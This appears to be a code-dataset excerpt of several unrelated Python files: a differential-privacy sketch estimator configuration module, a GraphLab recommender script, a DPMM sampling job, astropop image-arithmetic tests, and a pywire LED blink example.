epsilon_split : Ratio of privacy budget to spend to noise 1+ sketch. When
epsilon_split=0 the 1+ sketch is created from the underlying exact set
directly. epsilon_split should be smaller than 1.
Returns:
A SketchEstimatorConfig for stratified sketch with Exponential ADBF as its
base sketch.
Raises:
ValueError: if the sketch_operator is not one of 'bayesian' and
'expectation'.
"""
# Local noise.
if sketch_epsilon:
sketch_epsilon_float = sketch_epsilon
# The following denoiser is used by the cardinality estimator,
# so the epsilon should be that after privacy budget (epsilon) splitting.
sketch_denoiser = bloom_filters.SurrealDenoiser(
epsilon=sketch_epsilon * epsilon_split)
else:
sketch_epsilon_float = float('inf')
sketch_denoiser = None
# Global noise.
if global_epsilon is not None:
estimate_noiser = estimator_noisers.GeometricEstimateNoiser(
epsilon=global_epsilon)
else:
estimate_noiser = None
if sketch_operator_type == SKETCH_OPERATOR_EXPECTATION:
sketch_operator = (
bloom_filter_sketch_operators.ExpectationApproximationSketchOperator(
estimation_method=bloom_filters.FirstMomentEstimator.METHOD_EXP))
elif sketch_operator_type == SKETCH_OPERATOR_BAYESIAN:
sketch_operator = (
bloom_filter_sketch_operators.BayesianApproximationSketchOperator(
estimation_method=bloom_filters.FirstMomentEstimator.METHOD_EXP))
else:
raise ValueError('sketch operator should be one of '
'"{SKETCH_OPERATOR_BAYESIAN}" and '
'"{SKETCH_OPERATOR_EXPECTATION}".')
return SketchEstimatorConfig(
name=construct_sketch_estimator_config_name(
sketch_name='stratified_sketch_exp_adbf',
sketch_config=f'{length}_{EXP_ADBF_DECAY_RATE}',
estimator_name=f'first_moment_estimator_exp_{sketch_operator_type}',
sketch_epsilon=sketch_epsilon,
estimate_epsilon=global_epsilon,
max_frequency=str(max_frequency)),
sketch_factory=stratified_sketch.StratifiedSketch.get_sketch_factory(
max_freq=max_frequency,
cardinality_sketch_factory=(
bloom_filters.ExponentialBloomFilter.get_sketch_factory(
length=length, decay_rate=EXP_ADBF_DECAY_RATE)
),
noiser_class=bloom_filters.BlipNoiser,
epsilon=sketch_epsilon_float,
epsilon_split=epsilon_split,
union=sketch_operator.union,
),
estimator=stratified_sketch.SequentialEstimator(
sketch_operator=sketch_operator,
cardinality_estimator=bloom_filters.FirstMomentEstimator(
method=bloom_filters.FirstMomentEstimator.METHOD_EXP,
denoiser=sketch_denoiser,
noiser=estimate_noiser,
),
),
max_frequency=max_frequency,
)
def _exact_multi_set(max_frequency):
return SketchEstimatorConfig(
name=construct_sketch_estimator_config_name(
sketch_name='exact_multi_set',
sketch_config='10000',
estimator_name='lossless',
max_frequency=str(int(max_frequency))),
sketch_factory=exact_set.ExactMultiSet.get_sketch_factory(),
estimator=exact_set.LosslessEstimator(),
max_frequency=max_frequency,
)
def _exp_same_key_aggregator(max_frequency, global_epsilon, length):
"""Create an ExponentialSameKeyAggregator config.
Args:
max_frequency: the maximum frequency to estimate.
global_epsilon: the global DP epsilon parameter.
length: the length of the ExponentialSameKeyAggregator.
Returns:
A SketchEstimatorConfig of ExponentialSameKeyAggregator.
"""
if global_epsilon is not None:
estimate_noiser_class = estimator_noisers.GeometricEstimateNoiser
else:
estimate_noiser_class = None
return SketchEstimatorConfig(
name=construct_sketch_estimator_config_name(
sketch_name='exp_same_key_aggregator',
sketch_config='_'.join([str(int(length)), '10']),
estimator_name='standardized_histogram',
estimate_epsilon=global_epsilon,
max_frequency=str(max_frequency)),
sketch_factory=(
same_key_aggregator.ExponentialSameKeyAggregator.get_sketch_factory(
length, decay_rate=EXP_ADBF_DECAY_RATE)),
estimator=same_key_aggregator.StandardizedHistogramEstimator(
max_freq=max_frequency,
noiser_class=estimate_noiser_class,
epsilon=global_epsilon,
),
max_frequency=max_frequency,
)
def _generate_frequency_estimator_configs(max_frequency):
"""Create frequency estimator configurations."""
configs = []
# Stratified Sketch based on Vector-of-Counts.
for epsilon, clip, length in itertools.product(SKETCH_EPSILON_VALUES,
[False, True],
VOC_LENGTH_LIST):
configs.append(
_stratiefied_sketch_vector_of_counts(max_frequency, clip, length,
epsilon)
)
# Stratified Sketch based on exponential ADBF.
for sketch_epsilon, global_epsilon, length, sketch_operator_type in (
itertools.product(
SKETCH_EPSILON_VALUES, ESTIMATE_EPSILON_VALUES, ADBF_LENGTH_LIST,
SKETCH_OPERATOR_LIST)):
configs.append(
_stratiefied_sketch_exponential_adbf(max_frequency, length,
sketch_epsilon, global_epsilon,
sketch_operator_type)
)
for sketch_epsilon, global_epsilon, length in (
itertools.product(
SKETCH_EPSILON_VALUES, ESTIMATE_EPSILON_VALUES, ADBF_LENGTH_LIST)):
configs.append(
_stratiefied_sketch_geo_adbf(max_frequency, length,
sketch_epsilon, global_epsilon)
)
# Exact set.
configs.append(_exact_multi_set(max_frequency))
# Same-key-aggregator.
for global_epsilon, length in itertools.product(ESTIMATE_EPSILON_VALUES,
ADBF_LENGTH_LIST):
configs.append(
_exp_same_key_aggregator(max_frequency, global_epsilon, length))
return tuple(configs)
def get_estimator_configs(estimator_names, max_frequency):
"""Returns a list of estimator configs by name.
Args:
estimator_names: a list of estimators defined in the evaluation_configs.
max_frequency: an integer value of the maximum frequency level.
Returns:
A list of SketchEstimatorConfig.
Raises:
ValueError: if the estimator_names is not given, or any element of
estimator_names is not defined in the evaluation_configs.
"""
if not estimator_names:
raise ValueError('No estimators were specified.')
all_estimators = {
conf.name: conf for conf in
_generate_cardinality_estimator_configs()
+ _generate_frequency_estimator_configs(max_frequency)}
estimator_list = [all_estimators[c] for c in estimator_names
if c in all_estimators]
if len(estimator_list) == len(estimator_names):
return estimator_list
invalid_estimator_names = [c for c in estimator_names
if c not in all_estimators]
raise ValueError('Invalid estimator(s): {}\nSupported estimators: {}'.
format(','.join(invalid_estimator_names),
',\n'.join(all_estimators.keys())))
| StarcoderdataPython |
3283452 | <filename>model.py
from __future__ import print_function
import matplotlib as mpl
mpl.use('Agg') # Don't open display
import matplotlib.pyplot as plt
import numpy as np
import io
import logging
import graphlab as gl
from datetime import datetime
from termcolor import colored, cprint
import mailer
import os
import json
logger = logging.getLogger()
def run(conf):
to = conf['to']
method = conf['method']
latent_factors = list(range(1,conf['latent_factors']+1))
path = conf['path']
plot_filename = str(datetime.utcnow())
logger.info('Reading ratings.csv ...')
movies = gl.SFrame.read_csv(os.path.join(path, 'ratings.csv'),
column_type_hints=[int,int,float,int])
logger.info('Reading complete')
data = []
logger.info('Training model ...')
for i in latent_factors:
m = gl.recommender.factorization_recommender.create(movies,
user_id='userId',
item_id='movieId',
target='rating',
num_factors=i,
solver=method,
verbose=False)
logger.info('Processing... {0}'.format(i))
rmse = m.get('training_rmse')
data.append(rmse)
plt.plot(latent_factors, data)
plt.xlabel('Number of latent factors')
plt.ylabel('RMSE')
plt.title('Number of latent factors in comparsion with RMSE')
logger.info('Saving plot to disc ...')
plt.savefig('{0}.svg'.format(plot_filename))
logger.info('Save complete')
buf = io.BytesIO()
plt.savefig(buf, format = 'svg')
buf.seek(0)
mail = mailer.Mailer(os.path.join('./Credentials','credentials.json'))
mail.send(
toaddrs=to,
fromaddrs='<EMAIL>',
subject='Recommender engine',
body='Method used = {0}\nLatent_factors = {1}'.format(method,
len(latent_factors)),
payload=('{0}.svg'.format(plot_filename), buf))
| StarcoderdataPython |
3236005 | # -*- coding: utf-8 -*-
import sys
import numpy as np
import tables
import cPickle as pickle
from Dpmm import DPMM
from argparse import ArgumentDefaultsHelpFormatter, ArgumentParser
### Job submit script for Gibbs sampling on reference population model
# read arguments
p = ArgumentParser(formatter_class=ArgumentDefaultsHelpFormatter)
p.add_argument('algorithm', metavar='<inference-algorithm>',
choices=['gibbs','split_merge'],
help='inference algorithm to test')
p.add_argument('-i', metavar='<inputfile>',
help='input hdf5 file containing the data')
p.add_argument('-a', metavar='array', default='/reduced_samples/reference_double_sized_seed_54321/reference_pop',
help='path to data node within the input file')
p.add_argument('--alpha', type=float, metavar='<alpha>', default=1.0,
help='concentration parameter for the DP')
p.add_argument('--num-itns', type=int, metavar='<num-itns>', default=1000,
help='number of iterations')
p.add_argument('--save', metavar='<save>',
help='pickle the DPMM to this file')
args = p.parse_args()
# load data
try:
h5file = tables.open_file(args.i,'r')
node = h5file.get_node(args.a)
X = node.read()
except:
print "Couldn't read data %s from file %s " %(args.s, args.i)
sys.exit()
finally:
h5file.close()
# initialize DPMM
pre_alpha = 1.0
n_components = pre_alpha * np.log(X.shape[0])
# dump args to stdout
for arg in vars(args):
print arg, ": ", getattr(args, arg)
if args.algorithm == 'gibbs':
dpmm = DPMM(n_components=n_components.astype(int),alpha=pre_alpha,do_sample_alpha=True)
dpmm.fit_collapsed_Gibbs(X,do_kmeans=False,max_iter=args.num_itns,do_init=True)
elif args.algorithm == 'split_merge':
dpmm = DPMM(n_components=1,alpha=pre_alpha,do_sample_alpha=True)
dpmm.fit_conjugate_split_merge(X,do_kmeans=False,max_iter=args.num_itns,do_init=True)
# save the dpmm to outfile
pickle.dump(dpmm, open( args.save, "wb" ) )
| StarcoderdataPython |
1644514 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
import numpy as np
import numpy.testing as npt
import pytest
import pytest_check as check
from astropop.image_processing.imarith import imarith
from astropop.framedata import FrameData
# TODO: Test with None FrameData
# TODO: Test with None scalar values
# TODO: '%' and '**' functions
pars = pytest.mark.parametrize('op,vs', [('+', {'f1': {'v': 30, 'u': None},
'f2': {'v': 10, 'u': None},
'r': {'v': 40, 'u': None}}),
('+', {'f1': {'v': 30, 'u': 3},
'f2': {'v': 10, 'u': 4},
'r': {'v': 40, 'u': 5}}),
('-', {'f1': {'v': 30, 'u': None},
'f2': {'v': 10, 'u': None},
'r': {'v': 20, 'u': None}}),
('-', {'f1': {'v': 30, 'u': 3},
'f2': {'v': 10, 'u': 4},
'r': {'v': 20, 'u': 5}}),
('*', {'f1': {'v': 5, 'u': None},
'f2': {'v': 6, 'u': None},
'r': {'v': 30, 'u': None}}),
('*', {'f1': {'v': 5, 'u': 0.3},
'f2': {'v': 6, 'u': 0.4},
'r': {'v': 30,
'u': 2.022375}}),
('/', {'f1': {'v': 10, 'u': None},
'f2': {'v': 3, 'u': None},
'r': {'v': 3.33333333,
'u': None}}),
('/', {'f1': {'v': 10, 'u': 1},
'f2': {'v': 3, 'u': 0.3},
'r': {'v': 3.33333333,
'u': 0.47140452}}),
('//', {'f1': {'v': 10, 'u': None},
'f2': {'v': 3, 'u': None},
'r': {'v': 3.000000,
'u': None}}),
('//', {'f1': {'v': 10, 'u': 1},
'f2': {'v': 3, 'u': 0.3},
'r': {'v': 3.000000,
'u': 0.424264}})])
@pytest.mark.parametrize('handle_mask', [True, False])
@pytest.mark.parametrize('inplace', [True, False])
@pars
def test_imarith_ops_frames(op, vs, inplace, handle_mask):
propag_errors = [False] # use list to gen_frame works
def gen_frame(v):
# Gen frames with {'v', 'u'} dict
shape = (10, 10)
if v['u'] is None:
frame = FrameData(np.ones(shape, dtype='f8'), unit='adu')
else:
frame = FrameData(np.ones(shape, dtype='f8'), unit='adu',
uncertainty=v['u'])
propag_errors[0] = True # noqa
frame.data[:] = v['v']
return frame
frame1 = gen_frame(vs['f1'])
frame2 = gen_frame(vs['f2'])
exp_res = gen_frame(vs['r'])
if handle_mask:
mask1 = np.zeros((10, 10))
mask2 = np.zeros((10, 10))
mask1[5, 5] = 1
mask2[3, 3] = 1
exp_mask = np.zeros((10, 10))
exp_mask[5, 5] = 1
exp_mask[3, 3] = 1
frame1.mask = mask1
frame2.mask = mask2
exp_res.mask = exp_mask
propag_errors = propag_errors[0]
res = imarith(frame1, frame2, op, inplace=inplace,
propagate_errors=propag_errors,
handle_mask=handle_mask)
npt.assert_array_almost_equal(res.data, exp_res.data)
if propag_errors:
npt.assert_array_almost_equal(res.uncertainty,
exp_res.uncertainty)
if handle_mask:
npt.assert_array_equal(res.mask, exp_res.mask)
if inplace:
check.is_true(res is frame1)
else:
check.is_false(res is frame1)
def test_invalid_op():
frame1 = FrameData(np.zeros((10, 10)), unit='')
frame2 = FrameData(np.zeros((10, 10)), unit='')
with pytest.raises(ValueError) as exc:
imarith(frame1, frame2, 'not an op')
check.is_in('not supported', str(exc.value))
def test_invalid_shapes():
frame1 = FrameData(np.zeros((10, 10)), unit='')
frame2 = FrameData(np.zeros((5, 5)), unit='')
with pytest.raises(ValueError):
imarith(frame1, frame2, '+')
| StarcoderdataPython |
5112130 | <filename>examples/blink_example.py
from pywire import *
counter = Signal(26)
def increment(x):
return x+1
counter.drive(increment, args=counter)
led1 = Signal(1, io="out", port="P134")
def blink(slow_clock):
if slow_clock > 2**25:
return 1
else:
return 0
led1.drive(blink, args=(counter))
print(vhdl(globals(), name="blink_example"))
print(timing(globals(), 50, 'P56', vendor="Xilinx")) | StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.